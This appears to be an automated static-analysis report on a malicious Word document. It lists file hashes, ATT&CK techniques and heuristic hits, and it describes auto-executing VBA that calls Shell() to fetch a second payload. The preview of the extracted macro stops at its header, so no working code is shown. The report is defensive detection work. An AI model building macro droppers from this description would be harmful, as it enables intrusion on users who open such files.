Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 209702b2a3f15b57…

MALICIOUS

Office (OLE)

Size: 241.5 KB
Created: 2018-03-18 10:59:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 39d6761ddaf380429983482affd0e8cf
SHA-1: 25391ef801f11ad17e39ca72881359415188d200
SHA-256: 209702b2a3f15b57b69e94f0647e3e95123675e0d2460aed2e234d9633520d2d
Risk Score: 264

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File

The sample contains VBA macros, including a Workbook_Open auto-execution macro, which utilizes the Shell() function. This indicates the document is designed to download and execute a secondary payload. The presence of a 'macros.bas' file and the ClamAV detection further support its malicious nature.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20375 bytes
SHA-256: d8c7063f886da50c772838492ed68656ea69f3ffa6c442926bebd438cc89d543
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 78 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
... (truncated)